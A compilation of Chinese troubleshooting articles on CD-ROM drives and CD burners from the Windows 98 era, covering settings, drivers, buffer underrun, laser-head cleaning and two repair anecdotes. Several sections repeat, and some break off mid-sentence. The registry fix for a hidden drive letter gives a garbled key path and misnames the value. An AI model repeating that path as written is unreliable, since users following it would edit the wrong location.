    在正常情况下，当我们进入安全模式时，光驱的盘符是不会有的。如果我们想在安全模式下使用光驱，我们可以在Autoexec.BAT和Config.sys文件中加载光驱的驱动，这样我们在重新启动电脑后，就可以在安全模式下使用光驱了。

    2、CONFIG文件中设置LASTDRIVE数量设置太少

    如果我们在CONFIG。SYS文件中设置了“LASTDRIVE＝？”的数量太少，小于实际的驱动器数量，这时即使我们安装了光驱，但在“我的电脑“中了看不到光驱的影子。这时只要去掉该项设置或设置为“LASTDRIVE=Z”即可。

    3、DMA设置不当

    如果光驱只支持PIO4标准，不支持DMA／33标准，而我们却强行让光驱使用该标准(在“我的电脑”属性中“设备管理器”中光驱“CDROM”属性中“设置”选项的“DMA”前打“V”号)。这时有时会造成光驱丢失，有时会造成电脑不能正常启动。这时我们可以进入安全模式，将CDROM属性中的DMA设置去掉就可以了。我们所使用的硬盘或者光驱具体支持何种数据传输模式，我们在计算机启动过程中的第二屏的基本配置表中可以看到。

    4、光驱在注册表里被恶意屏蔽掉了

    如果有人在“我的电HKEY＿CURRENT＿USERSoftwareMicrosoftWindowsCurrentVrsionPolicesxplorer中的“NoDrivers“的二进制值是否是光驱的值。正常情况下没有该项，也可将该项值改为“00 00 00 00“(01 00 00 00为A，04 00 00 00为C，FF FF FF FF为隐藏所有驱动器)。

    注意现在有的病毒专门更改注册表，使光驱盘符丢失，害得我们又是格式化硬盘，又是装系统的。有的病毒不会使光驱盘符丢失，但是会禁止光驱读盘，什么样的光盘也不能读，但在却能够用光盘启动。

    5、光驱的驱动是否安装正确

    如果光驱的驱动程序安装的不是它自己的驱动程序，也会出现光驱丢失的情况。这种情况的出现一般是我们为了提高光驱的性能，人为的添加从网络或者光盘中找到的光驱加速程序或者其他程序。通常在WIN98和95中都自带了光驱的驱动，不需要另外添加。这时可进入安全模式将“设备管理器“中的“CDROM“选项删除，然后重新启动计算机，让系统自己发现新硬件重新安装光驱的驱动即可。

    6、CMOS设置不当

    如果在CMOS设置中传输模式设置有误--不支持PIO MODE3或PIO MODE4或者DMA／33的老光驱便会在WIN98或者95中出现没有光驱的图标，无光驱可用。这时只需要进入CMOS中将“INTEGRATED PERIPHERAIS“项，将“IDE PRIMARY MASTER PIO(或UDMA)“和“IDE PRIMARY SLAVE PIO(或UDMA)“改为“AUTO“即可。对了，如果我们在CMOS中将对应光驱的IDE接口“DISABLE“掉了，光驱无论如何也发现不了的。

    7.使用虚拟光驱不当

    虚拟光驱可以避免频繁读取光盘，提高读取速度，为我们方便的玩光盘游戏提供了可能。不过有时我们在不想使用虚拟光驱程序时，想卸载它或者想安装最新的程序时，却出现了意外，虚拟光驱的盘符有，但实际光驱的盘符却没有了。

    一点小小建议

    现在光驱便宜了，但是使用寿命也似乎短了不少。记得原来的8X光驱一个能用三年或者更多，面现在的40X、50X光驱用上三个月就显得不是很有“力“了，对稍微差一点的盘(全部读正版光盘的又有几个呢？更何况正版又不全部都是“金子“)便力不从心了。一般电脑市场中维修光驱的都是将光头清洗一下，顺便把光头的发射功率调大一些，哄哄外行罢了。因为一般光驱的安装位置都在电源的前面，电源风扇产生的气流会有一部分流过光驱，当电脑停止工作时，这部分正在光驱中的灰尘就留在了光头上。随着时间的积累，再加上使用环境又都不是真空，光驱自然而然的就坏得快了。我在使用中发现如果有一个塑料袋将光驱从后向前(出盘)封闭，再把数据线，电源线隔着塑料薄膜接好，经过如此处理，光驱可以用上一年不用清洗光头。我的一只8X美达光驱用了四年了，还能放VCD呢。这样做，一定要注意散热问题，如果你的光驱的发热量大那就不能这样做了。

    顺便提一点：还有就目前的生产技术，完全可以将光头朝下安装，也就是将光盘把数据面向上放入光驱。这样光驱的寿命就大大加长，光头上不可能落下灰尘，减少了损坏了机会。如果这样做，我们大家买一个光驱可以用上四五年，但光驱生产厂家就不赚钱了！

有零工作室　www.you0.com www.you0.net 联系QQ 3149886


刻录机

《一键清理系统垃圾》

刻录机

[color=Red]常见故障一：安装刻录机后无法启动电脑 [/color]
[color=Blue]首先切断电脑供电电源，打开机箱外壳检查IDE线是否完全插入，并且要保证PIN-1的接脚位置正确连接。如果刻录机与其它IDE设备共用一条IDE线，需保证两个设备不能同时设定为“MA”(Master)或“SL”(Slave)方式，可以把一个设置为“MA”，一个设置为“SL”。 [/color]

[color=Red]常见故障二：使用模拟刻录成功，实际刻录却失败 [/color]
[color=Blue]刻录机提供的“模拟刻录”和“刻录”命令的差别在于是否打出激光光束，而其它的操作都是完全相同
的，也就是说，“模拟刻录＂可以测试源光盘是否正常，硬盘转速是否够快，剩余磁盘空间是否足够等刻录环境的状况，但无法测试待刻录的盘片是否存在问题和刻录机的激光读写头功率与盘片是否匹配等等。有鉴于此，说明“模拟刻录”成功，而真正刻录失败，说明刻录机与空白盘片之间的兼容性不是很好，可以采用如下两种方法来重新试验一下：
    1. 降低刻录机的写入速度，建议2X以下；
    2. 请更换另外一个品牌的空白光盘进行刻录操作。出现此种现象的另外一个原因就是激光读写头功率衰减现象造成的，如果使用相同品牌的盘片刻录，在前一段时间内均正常，则很可能与读写头功率衰减有关，可以送有关厂商维修。
[/color]

[color=Red]常见故障三：无法复制游戏CD [/color]
[color=Blue]一些大型的商业软件或者游戏软件，在制作过程中，对光盘的盘片做了保护，所以在进行光盘复制的过程中，会出现无法复制，导致刻录过程发生错误，或者复制以后无法正常使用的情况发生。 [/color]

[color=Red]常见故障四：刻录的CD音乐不能正常播放 [/color]
[color=Blue]并不是所有的音响设备都能正常读取CD-R盘片的，大多数CD机都不能正常读取CD-RW盘片的内容，所以最好不要用刻录机来刻录CD音乐。另外，还需要注意的是，刻录的CD音乐，必须要符合CD-DA文件格式。 [/color]

[color=Red]常见故障五：刻录软件刻录光盘过程中，有时会出现“BufferUnderrun”的错误提示信息[/color]
[color=Blue]“BufferUnderrun”错误提示信息的意思为缓冲区欠载。一般在刻录过程中，待刻录数据需要由硬盘经
过IDE界面传送给主机，再经由IDE界面传送到刻录机的高速缓存中(BufferMemory)，最后刻录机把储存在
BufferMemory里的数据信息刻录到CD-R或CD-RW盘片上，这些动作都必须是连续的，绝对不能中断，如果其中任何一个环节出现了问题，都会造成刻录机无法正常写入数据，并出现缓冲区欠载的错误提示，进而是盘片报废。解决的办法就是，在刻录之前需要关闭一些常驻内存的程序，比如关闭光盘自动插入通告，关闭防毒软件、Window任务管理和计划任务程序和屏幕保护程序等等。
[/color]
[color=Red]常见故障六：光盘刻录过程中，经常会出现刻录失败[/color]
[color=Blue]提高刻录成功率需要保持系统环境单纯，即关闭后台常驻程序，最好为刻录系统准备一个专用的硬盘，专门安装与刻录相关的软件。在刻录过程中，最好把数据资料先保存在硬盘中，制作成“ISO镜像文件”，然后再刻入光盘。为了保证刻录过程数据传送的流畅，需要经常对硬盘碎片进行整理，避免发生因文件无法正常传送，造成的刻录中断错误，可以通过执行“磁盘扫描程序”和“磁盘碎片整理程序”来进行硬盘整理。此外，在刻录过程中，不要运行其它程序，甚至连鼠标和键盘也不要去轻易去碰。刻录使用的电脑最好不要与其他电脑联网，在刻录过程中，如果系统管理员向本机发送信息，会影响刻录效果，另外，在局域网中，不要使用资源共享，如果在刻录过程中，其它用户读取本地硬盘，会造成刻录工作中断或者失败。除此以外，还要注意刻录机的散热问题，良好的散热条件会给刻录机一个稳定的工作环境，如果因为连续刻录，刻录机发热量过高，可以先关闭电脑，等温度降低以后再继续刻录。针对内置式刻录机最好在机箱内加上额外的散热风扇。外置式刻录机要注意防尘，防潮，以免造成激光头读写不正常。 [/color]

[color=Red]常见故障七：使用EasyCDPro刻录无法识别中文目录名 [/color]
[color=Blue]在使用EasyCDPro刻录中文文件名的时候，可以在文件名选项中选取Romeo，就可以支持长达128位文件[/color]


刻录机常见故障维修

《一键清理系统垃圾》

刻录机常见故障维修

刻录机

    常见故障一：安装刻录机后无法启动电脑

    首先切断电脑供电电源，打开机箱外壳检查IDE线是否完全插入，并且要保证PIN-1的接脚位置正确连接。如果刻录机与其它IDE设备共用一条 IDE线，需保证两个设备不能同时设定为“MA”(Master)或“SL”(Slave)方式，可以把一个设置为“MA”，一个设置为“SL”。

    常见故障二：使用模拟刻录成功，实际刻录却失败

    刻录机提供的“模拟刻录”和“刻录”命令的差别在于是否打出激光光束，而其它的操作都是完全相同的，也就是说，“模拟刻录＂可以测试源光盘是否正常，硬盘转速是否够快，剩余磁盘空间是否足够等刻录环境的状况，但无法测试待刻录的盘片是否存在问题和刻录机的激光读写头功率与盘片是否匹配等等。有鉴于此，说明“模拟刻录”成功，而真正刻录失败，说明刻录机与空白盘片之间的兼容性不是很好，可以采用如下两种方法来重新试验一下：
    1. 降低刻录机的写入速度，建议2X以下；
    2. 请更换另外一个品牌的空白光盘进行刻录操作。出现此种现象的另外一个原因就是激光读写头功率衰减现象造成的，如果使用相同品牌的盘片刻录，在前一段时间内均正常，则很可能与读写头功率衰减有关，可以送有关厂商维修。

    常见故障三：无法复制游戏CD

    一些大型的商业软件或者游戏软件，在制作过程中，对光盘的盘片做了保护，所以在进行光盘复制的过程中，会出现无法复制，导致刻录过程发生错误，或者复制以后无法正常使用的情况发生。

    常见故障四：刻录的CD音乐不能正常播放

    并不是所有的音响设备都能正常读取CD-R盘片的，大多数CD机都不能正常读取CD-RW盘片的内容，所以最好不要用刻录机来刻录CD音乐。另外，还需要注意的是，刻录的CD音乐，必须要符合CD-DA文件格式。

    常见故障五：刻录软件刻录光盘过程中，有时会出现“BufferUnderrun”的错误提示信息

    “BufferUnderrun”错误提示信息的意思为缓冲区欠载。一般在刻录过程中，待刻录数据需要由硬盘经过IDE界面传送给主机，再经由IDE界面传送到刻录机的高速缓存中(BufferMemory)，最后刻录机把储存在BufferMemory里的数据信息刻录到CD-R或CD-RW盘片上，这些动作都必须是连续的，绝对不能中断，如果其中任何一个环节出现了问题，都会造成刻录机无法正常写入数据，并出现缓冲区欠载的错误提示，进而是盘片报废。解决的办法就是，在刻录之前需要关闭一些常驻内存的程序，比如关闭光盘自动插入通告，关闭防毒软件、Window任务管理和计划任务程序和屏幕保护程序等等。

    常见故障六：光盘刻录过程中，经常会出现刻录失败

    提高刻录成功率需要保持系统环境单纯，即关闭后台常驻程序，最好为刻录系统准备一个专用的硬盘，专门安装与刻录相关的软件。在刻录过程中，最好把数据资料先保存在硬盘中，制作成“ISO镜像文件”，然后再刻入光盘。为了保证刻录过程数据传送的流畅，需要经常对硬盘碎片进行整理，避免发生因文件无法正常传送，造成的刻录中断错误，可以通过执行“磁盘扫描程序”和“磁盘碎片整理程序”来进行硬盘整理。此外，在刻录过程中，不要运行其它程序，甚至连鼠标和键盘也不要去轻易去碰。刻录使用的电脑最好不要与其他电脑联网，在刻录过程中，如果系统管理员向本机发送信息，会影响刻录效果，另外，在局域网中，不要使用资源共享，如果在刻录过程中，其它用户读取本地硬盘，会造成刻录工作中断或者失败。除此以外，还要注意刻录机的散热问题，良好的散热条件会给刻录机一个稳定的工作环境，如果因为连续刻录，刻录机发热量过高，可以先关闭电脑，等温度降低以后再继续刻录。针对内置式刻录机最好在机箱内加上额外的散热风扇。外置式刻录机要注意防尘，防潮，以免造成激光头读写不正常。

    常见故障七：使用EasyCDPro刻录无法识别中文目录名

    在使用EasyCDPro刻录中文文件名的时候，可以在文件名选项中选取Romeo，就可以支持长达128位文件名，即64个汉字的文件名了。另外，WinonCD、Nero、DirectCD2.x等都能很好地支持长中文文件名，EasyCDCreator在这方面要稍微麻烦一些。


刻录机故障维修实例

《一键清理系统垃圾》

刻录机故障维修实例

去年买了一台内置刻录机SONY CD-RW CRX140E，8×4×32×，用了一年多，感觉还比较好，很少刻废盘。近日突然发现无法使用，连光盘也读不出来。无奈保修期已过，去广州修又路途遥远，抱着死马当活马医的心态，大胆一试，结果修理成功，而且修理过程颇有心得，特写下来与大家共享，也许能对你有所帮助。

从主机中取出刻录机，放在一宽大、光线充足的台上，小心拆开刻录机的底盖，露出电路板。电路板有两块，一大一小，大的由两个螺丝固定。取下螺丝后，要拆开几条连线才能完全取下电路板(只取大的)，由于连线是在塑料片基上印制的线排，拆的时候要小心。注意在拆连接线的时候，要先除去上面的胶布，然后掰开线座上的卡子，才能把线排拔出。然后用硬铁丝顶出拖盘，取下面板，这时才能取出上盖。 经过仔细观察，发现是光头伺服部分传动有问题，有两个齿轮没有啮合，一个是电机上的齿轮，一个是旁边的双层齿轮(这个齿轮有点特殊，不知道为什么是两层，而且两层一模一样，都是与第三个齿轮啮合)，看来是电机上的齿轮向外滑出了些距离，所以啮合不到。于是用力把它压回去，由于用力过大，齿轮上的部分已经接触到旁边的电路板了，所以无法转动，又用起子把它向外撬了一点，刚好与双层齿轮的上层啮合。试试能传动了，于是装回电路板，接上电脑一试。结果，一通电，就听到“叭叭”的几声，一看是光头在径向来回快速移动，移到两头后，由于速度快，所以打得“叭叭”响。赶紧断电。由于曾经拆过电路板，所以又仔细检查了一遍，没有问题，重新通电问题依旧，我开始怀疑是不是电路出了问题。但我还是没有放弃，继续观察，结果发现了几个问题不好理解。

第一个问题是传动的第二个齿轮是双层齿轮，两层一样，而且和同一个齿轮啮合，不知是何道理。第二个问题是电动机上的齿轮的形状比较特殊，它不是一个单独的齿轮，上面还有一个比齿轮大一点的圆盘，圆盘并没有跟任何部件接触，而且圆盘边缘处下方有一黑色橡胶环，不知是作何用途。第三个问题是光头径向移动到头后如何判断到头了？两头并没有发现任何机关或传感器之类的东西。

第一个问题至今没找到答案。不过后两个问题的解决却是修好刻录机的关键。

我发现橡胶环下的电路上有两个元件(半个绿豆大)，而这个电路板上的元件很少，其它地方完全放得下这两个元件，为何要放到这个下方。原来就是用这个和电机上的橡胶环来检测电机的转动。大概橡胶环上有磁性物质，下面的元件则能检测磁场的变化，从而检测电机的转动。现在这个环和下面的元件距离还有点大，元件感应不到，所以检测不到移动，导致光头乱跑。道理想通了，就来试试看。小心的把齿轮往下敲，直到刚好不接触到元件为止。装上一试，果然成功。

刻录机欠载故障实例分析
笔者买的是LG 24×的IDE刻录机，型号是GCE-8240B。当时32×刚刚出来，24×开始降价，所以应该是个比较好的选择时机。但是，笔者在实际应用中遇到了不少问题。

    故障现象：LG刻录机安装在笔者的电脑上后，刻录光盘时无法使用最高速进行刻录。刻录时只能使用12×以下，最稳定的是选用8×，不然会频繁出现刻录欠载现象。

    故障分析：笔者电脑配置：主板是ABIT的BE6-Ⅱ（BX），CPU是PⅡ233，128MB内存，TNT2pro32MB显卡，15GB昆腾硬盘。笔者曾经尝试换了一块杂牌的VIA693的主板，依然有这个问题。笔者针对故障做了几个可能性的判断。
    1.刻录机有问题
    笔者使用的是NERO刻录软件，它可以对设备的型号和软件做一个识别。笔者发现可以正常识别刻录机的型号和一些参数，当时版本是1.07，上网查到LG已经升级到1.08版，下载后进行了升级，但没有改善。
    2.刻录盘的问题
    据笔者所知，的确有不少时候速度上不去是刻录盘的原因。由于笔者的刻录机有8MB的缓存，并且具备“ExacLink”技术来防止自动缓存交互错误，所以，反复出现欠载是比较可能的。由于刻录机24×出现不久，对不少盘的刻录速度的确需要实际的检验。笔者选用了3种价格不同的刻录盘，发现仍然出现问题，排除了刻录盘的问题。
    3.电脑和刻录机兼容性问题
    一般，出现的故障比较可能的是由设置和软件使用带来的。笔者首先想到的是DMA通道问题。DMA不打开时，CPU的占用率会很高。

    主板VIA693必须打4in1的补丁才可以打开DMA，打开后首先发现刻录出错，点“取消”后发现不出错了，但是现象依旧。难道LG刻录机不支持DMA?一查说明书，第一句就是“使用VIA芯片组的主板，请关闭DMA模式”。

    由于这块VIA主板不支持UDMA66，不能发挥笔者的硬盘速度。笔者只好仍然使用原来那块BE6Ⅱ的主板。但是，又发现一个问题，BX板的DMA不可选，怎么回事?一旦笔者选择了DMA，光盘的盘符就不见了。由于笔者使用的是Win98操作系统，应该在光驱支持DMA的情况下能正常打开。

    查了一下LG刻录机的资料，支持PIO4和DMA。其中，PIO4就是笔者一直使用的模式，PIOProgrammed I/O模式的最大弊端是耗用极其大量的CPU资源，在以前还未有DMA模式光驱的时候，光驱都是以PIO模式运行。而它所支持的DMA也与笔者平常简称的DMA不同。DMA模式分为Single-Word DMA及Multi-Word DMA两种，跟PIO模式的最大区别是：DMA模式并不用过分依赖CPU的指令而运行，可达到节省处理器运行资源的效果。不过，后来由于Ultra DMA模式的出现和快速普及，这两个模式也只会是昙花一现，不久即被UDMA所取代。而笔者所说的DMA33就是UDMA了，中间出现的DMA已经被替代了。但是，LG刻录机选用的DMA模式是Multi-Word DMA，所以，笔者看不到它支持UDMA33，这是它在选用DMA时的不同。

    那么，确认了支持Multi-Word DMA后，还不能打开DMA只有可能是主板上的一些设置导致冲突。进入BIOS设置，发现由于IRQ中断自动识别时出现过问题，笔者强行指定了中断号。恢复自动设置后，再进入“控制面板→系统→设备管理器→CD-ROM→刻录机→属性→设置→DMA设定”中进行选择

刻录机常见故障维修
刻录机

    常见故障一：安装刻录机后无法启动电脑

    首先切断电脑供电电源，打开机箱外壳检查IDE线是否完全插入，并且要保证PIN-1的接脚位置正确连接。如果刻录机与其它IDE设备共用一条 IDE线，需保证两个设备不能同时设定为“MA”(Master)或“SL”(Slave)方式，可以把一个设置为“MA”，一个设置为“SL”。

    常见故障二：使用模拟刻录成功，实际刻录却失败

    刻录机提供的“模拟刻录”和“刻录”命令的差别在于是否打出激光光束，而其它的操作都是完全相同的，也就是说，“模拟刻录＂可以测试源光盘是否正常，硬盘转速是否够快，剩余磁盘空间是否足够等刻录环境的状况，但无法测试待刻录的盘片是否存在问题和刻录机的激光读写头功率与盘片是否匹配等等。有鉴于此，说明“模拟刻录”成功，而真正刻录失败，说明刻录机与空白盘片之间的兼容性不是很好，可以采用如下两种方法来重新试验一下：
    1. 降低刻录机的写入速度，建议2X以下；
    2. 请更换另外一个品牌的空白光盘进行刻录操作。出现此种现象的另外一个原因就是激光读写头功率衰减现象造成的，如果使用相同品牌的盘片刻录，在前一段时间内均正常，则很可能与读写头功率衰减有关，可以送有关厂商维修。

    常见故障三：无法复制游戏CD

    一些大型的商业软件或者游戏软件，在制作过程中，对光盘的盘片做了保护，所以在进行光盘复制的过程中，会出现无法复制，导致刻录过程发生错误，或者复制以后无法正常使用的情况发生。

    常见故障四：刻录的CD音乐不能正常播放

    并不是所有的音响设备都能正常读取CD-R盘片的，大多数CD机都不能正常读取CD-RW盘片的内容，所以最好不要用刻录机来刻录CD音乐。另外，还需要注意的是，刻录的CD音乐，必须要符合CD-DA文件格式。

    常见故障五：刻录软件刻录光盘过程中，有时会出现“BufferUnderrun”的错误提示信息

    “BufferUnderrun”错误提示信息的意思为缓冲区欠载。一般在刻录过程中，待刻录数据需要由硬盘经过IDE界面传送给主机，再经由IDE界面传送到刻录机的高速缓存中(BufferMemory)，最后刻录机把储存在BufferMemory里的数据信息刻录到CD-R或CD-RW盘片上，这些动作都必须是连续的，绝对不能中断，如果其中任何一个环节出现了问题，都会造成刻录机无法正常写入数据，并出现缓冲区欠载的错误提示，进而是盘片报废。解决的办法就是，在刻录之前需要关闭一些常驻内存的程序，比如关闭光盘自动插入通告，关闭防毒软件、Window任务管理和计划任务程序和屏幕保护程序等等。

    常见故障六：光盘刻录过程中，经常会出现刻录失败

    提高刻录成功率需要保持系统环境单纯，即关闭后台常驻程序，最好为刻录系统准备一个专用的硬盘，专门安装与刻录相关的软件。在刻录过程中，最好把数据资料先保存在硬盘中，制作成“ISO镜像文件”，然后再刻入光盘。为了保证刻录过程数据传送的流畅，需要经常对硬盘碎片进行整理，避免发生因文件无法正常传送，造成的刻录中断错误，可以通过执行“磁盘扫描程序”和“磁盘碎片整理程序”来进行硬盘整理。此外，在刻录过程中，不要运行其它程序，甚至连鼠标和键盘也不要去轻易去碰。刻录使用的电脑最好不要与其他电脑联网，在刻录过程中，如果系统管理员向本机发送信息，会影响刻录效果，另外，在局域网中，不要使用资源共享，如果在刻录过程中，其它用户读取本地硬盘，会造成刻录工作中断或者失败。除此以外，还要注意刻录机的散热问题，良好的散热条件会给刻录机一个稳定的工作环境，如果因为连续刻录，刻录机发热量过高，可以先关闭电脑，等温度降低以后再继续刻录。针对内置式刻录机最好在机箱内加上额外的散热风扇。外置式刻录机要注意防尘，防潮，以免造成激光头读写不正常。

    常见故障七：使用EasyCDPro刻录无法识别中文目录名

    在使用EasyCDPro刻录中文文件名的时候，可以在文件名选项中选取Romeo，就可以支持长达128位文件名，即64个汉字的文件名了。另外，WinonCD、Nero、DirectCD2.x等都能很好地支持长中文文件名，EasyCDCreator在这方面要稍微麻烦一些。

光驱日常维护及故障维修
在电脑的各部件中，光驱是属于易损耗的产品之一，其它部件也许用上六七年都还能正常使用（就是更新换代跟不上了），但光驱多则两三年，少则不到一年就不能用了。并且出问题的光驱维修起来也是比较麻烦的，送回厂家维修，也许还不如买一个新的，自己或许对此又无能为力。这里结合自己平时的一些使用和维修经验，谈谈光驱的维护及常见的一些故障的维修方法，以作参考。

    1、光驱的日常维护

    1.1 对光盘的选择

    在选用光盘时，应尽量挑光盘面光洁度好、无划痕的盘，并且对盘的厚度也须加注意。质量好的盘通常会稍厚一些；而质量差的盘比较薄，使光驱加紧机构运转很吃力。质量不好的光盘，如盘片变形、表面严重划伤、污染以及盗版光盘等，在光驱内进行读取时，光学拾取头的物镜将不断地上下跳动和左右摆动，以保证激光束在高低不平和左右偏摆的信息轨迹上实现正确聚集和寻道，加重了系统的负担，加快了机械磨损。同时，为了减少光驱的磨损，延长光驱的使用寿命，不要经常用光驱来长时间播放VCD影碟，因为这样， 电机与激光头就增加了工作时间，从而缩短了光驱的使用寿命。另外在关机时，如果劣质光盘留在离激光头很近的地方，那当电机转起来后很容易划伤光头。

    1.2 光驱的入盒和出盒

    尽量将光盘放在光驱拖架中，有一些光驱托盘很浅，若光盘未放好就进盒，易造成光驱门机械错齿卡死。同时进盘时不要用手推光驱门，应使用面板上的进出盒键，以免入盘机构齿轮错位。
    在不使用光驱时，应尽量取出光盘，因为光驱只要其中有光盘，主轴电机就会不停地旋转，光头不停地寻迹、对焦，这样会加快其机械磨损，使光电管老化。
不要在光驱读盘时强行退盘，因这时主轴电机还在高速转动，而激光头组件还未复位。一方面会划伤光盘；另一方面还会打花激光头聚焦透镜及造成透镜移位。应待光驱灯熄灭后再按出盒键退盘。

    1.3 保证光驱的通风良好

    众所周知，现在高倍速光驱的转速极快，几乎赶超了硬盘，所带来的最大弊端就是发热量极大。对于现在市场上大部分以塑料为机芯的CDROM来说，高热量是降低其寿命的重要因素，因为塑料的耐热能力较差，长期使用自然会出现问题造成读盘不顺利。但光驱的机芯又很难像显卡或CPU那样依靠散热片和风扇来散热，因此高发热问题必须引起人们的重视。因此我们要把光驱放在一个通风良好的地方，来保持它具有良好的散热性，以便保证光驱能够稳定运行。
    当然，日常维护还有其它很多方面，一定要养成正确的使用和保养方法，才能让光驱的寿命最大化。对于一些经常使用的光盘，如果硬盘比较空闲的用户，最好把它制作成虚拟光驱文件。要养成定期清洁激光头的习惯。

    2、光驱的常见故障

    光驱的平均无故障时间为2500小时左右，正常使用寿命一般为二年左右，当然这要看光驱的实际使用时间。时间久了，光驱常会出现不读盘的故障，一般均显示为：“驱动器X没有光盘，插入光盘再试”或“CDR101：NOT READY READING DRIVE X ABORT,RETRY,FAIL?”。光驱由机械部件、电子部件和光学部件三类部件组成，在使用、维护时较普通软盘驱动器、硬盘复杂，且故障率较高，故障的分析、定位也较复杂。对光驱进行排查故障的一般过程是先检查和排除与光驱相连的各信号线、电源线等；其次排除上述“其它故障”中的各个方面；然后检查系统配置及参数设置情况；再考查光学部件、机械部件因素，最后考查电子部件故障。
    光驱的故障按故障源一般有接口故障、系统配置故障、光学故障、机械故障、电子故障和其它故障六大类。

    2.1 接口故障

    此类故障主要原因有：光驱的接口与主板接口不匹配（出现CDR-103错误提示），在增加或减少新硬件时，造成光驱的信号线（包括与其它多媒体部件的连接线）、电源线、跳线等之间的松动、错误连接或断线等等。这类故障的具体现象有“不认”光驱、“读写”错误、主机死机等等。

    2.2 系统配置故障

    此类故障的主要原因有：系统增加了新硬件后I/O、DMA和IRQ有冲突；CMOS中有关CDROM的设置不当；与硬盘的主从关系设置有误等。具体现象有光驱不工作、光驱灯亮一段时间后死机、“读写”错误、不出现盘符或误报多个盘符等。
    例如：一台电脑加装一个6倍速的光驱，是与1.2GB的硬盘共用Primary IDE接口，使用一段时间后，按主板说明将光驱接到Secondary IDE接口上后，发现光驱不能工作了。
    分析与处理过程：由于光驱接在Primary IDE口时工作正常，故可以排除光驱自身的问题，考虑到CMOS BIOS在改变插口后未设置，怀疑BIOS的设置对光驱可能有影响，开机进入BIOS设置，发现其中的IDE Drive1项设为None，于是将IDE Drive1项改为缺省值AUTO后，再开机，光驱能够正常工作。

    2.3 光学部件故障

    此类故障的主要原因有激光二极管和光电接收二极管老化、失效；光头聚焦性能变差，激光不能正常聚焦到光盘上；信号接收单元不能正常接收信号；激光头表面和聚焦镜表面积尘太多，激光强度减弱等。具体现象是放入光盘后无反映、读取光盘上数据困难、读取时间变长、“读写”错误、“不认”光盘、“挑盘”、“死机”、提示“CDR-101”或“CDR-103”错误信息等。
    CDROM光头使用寿命一般在2000～3000小时。随着使用时间的增长，光头功率逐渐下降，通过调整光头调节器以增大光头功率的方法，可改善其读盘能力，但这会加速光头的老化，减少光头的使用寿命。
    例如一台高仕达16倍速光驱，使用了半年后，发现原来一直能够正常使用的光盘，绝大部分读不出来，并显示“CDR-101”错误。如果反复按“R”键再试，则可读出一些信息。为了定位故障所在，我们先在光驱内放一张CD盘，发现能将整盘从头到尾播放完。由此排除了光驱的寻道和步进电机等机械部分、电子部件的故障，判定很有可能是激光头故障，导致不能正确读出光盘上的信号。于是将光驱拆开，使激光头露出来，用干净丝绸缠在小木棍上，沾上少许无水酒精轻轻擦拭激光头表面，然后，置于干净环境中晾干，再把各部件按序装好，装回计算机，开机测试，发现光盘工作正常，故障消失。这是一种典型的光学部件故障。

    2.4 机械部件故障的分析与定位

    此类故障的主要原因有机械部件磨损、损坏产生位移等现象导致激光头定位不准；压盘机械部分有纰漏，不能加紧光盘，导致盘片转动失常。具体现象有托盘不能弹出、“挑盘”、“不认盘”、“读写”错误等，多出现在经常非法、强制操作，或环境较恶劣的情况下。对于这类故障，可将CDROM机械部分重新进行装配，适当补偿部件磨损，调整机构运动精度，在压盘轴孔处加装垫片等维修方法。

    2.5 电子部件故障

    此类故障较为少见，其主要原因有光驱电子线路板损坏、电子元件老化、损坏等。具体现象有光驱不工作、不能出现盘符、“读写”错误等等。
出现此类故障一般要送回厂家维修点或专业维修店维修。具体是要更换相应的电路板或元器件。

    2.6 其它故障

    此类故障的主要原因有环境因素、设备驱动程序问题（出现CDR-101：Bead Fail提示信息）、CDROM盘有灰尘、划痕、不正确的操作、固定螺丝太长、维修不当的残余物或上述诸故障的综合等等。

    3、光驱的维修基本操作方法

    光驱读盘不出的硬件故障主要集中在激光头组件上，且可分为二种情况：一种是使用太久造成激光管老化；另一种是光电管表面太脏或激光管透镜太脏及位移变形。所以在对激光管功率进行调整时，还需对光电管和激光管透镜进行清洗。

    3.1 光电管及聚焦透镜的清洗。

    拔掉连接激光头组件的一组扁平电缆，记住方向，拆开激光头组件。这时能看到护套罩着激光头聚焦透镜，去掉护套后会发现聚焦透镜由四根细铜丝连接到聚焦、寻迹线圈上，光电管组件安装在透镜正下方的小孔中。用细铁丝包上棉花沾少量蒸馏水擦拭（不可用酒精擦拭光电管和聚焦透镜表面），并看看透镜是否水平悬空正对激光管，否则须适当调整。至此，清洗工作完毕。

    3.2 调整激光头功率。

    在激光头组件的侧面有1个像十字螺钉的小电位器。用色笔记下其初始位置，一般先顺时针旋转5°～10°，装机试机不行再逆时针旋转5°～10°，直到能顺利读盘。注意切不可旋转太多，以免功率太大而烧毁光电管。
    按照上述拆卸步骤由里到外依次装好，开机后应该一切正常。经这样处理后的光驱一般都能正常工作。


刻录机故障维修实例

《一键清理系统垃圾》

刻录机故障维修实例

去年买了一台内置刻录机SONY CD-RW CRX140E，8×4×32×，用了一年多，感觉还比较好，很少刻废盘。近日突然发现无法使用，连光盘也读不出来。无奈保修期已过，去广州修又路途遥远，抱着死马当活马医的心态，大胆一试，结果修理成功，而且修理过程颇有心得，特写下来与大家共享，也许能对你有所帮助。

从主机中取出刻录机，放在一宽大、光线充足的台上，小心拆开刻录机的底盖，露出电路板。电路板有两块，一大一小，大的由两个螺丝固定。取下螺丝后，要拆开几条连线才能完全取下电路板(只取大的)，由于连线是在塑料片基上印制的线排，拆的时候要小心。注意在拆连接线的时候，要先除去上面的胶布，然后掰开线座上的卡子，才能把线排拔出。然后用硬铁丝顶出拖盘，取下面板，这时才能取出上盖。 经过仔细观察，发现是光头伺服部分传动有问题，有两个齿轮没有啮合，一个是电机上的齿轮，一个是旁边的双层齿轮(这个齿轮有点特殊，不知道为什么是两层，而且两层一模一样，都是与第三个齿轮啮合)，看来是电机上的齿轮向外滑出了些距离，所以啮合不到。于是用力把它压回去，由于用力过大，齿轮上的部分已经接触到旁边的电路板了，所以无法转动，又用起子把它向外撬了一点，刚好与双层齿轮的上层啮合。试试能传动了，于是装回电路板，接上电脑一试。结果，一通电，就听到“叭叭”的几声，一看是光头在径向来回快速移动，移到两头后，由于速度快，所以打得“叭叭”响。赶紧断电。由于曾经拆过电路板，所以又仔细检查了一遍，没有问题，重新通电问题依旧，我开始怀疑是不是电路出了问题。但我还是没有放弃，继续观察，结果发现了几个问题不好理解。

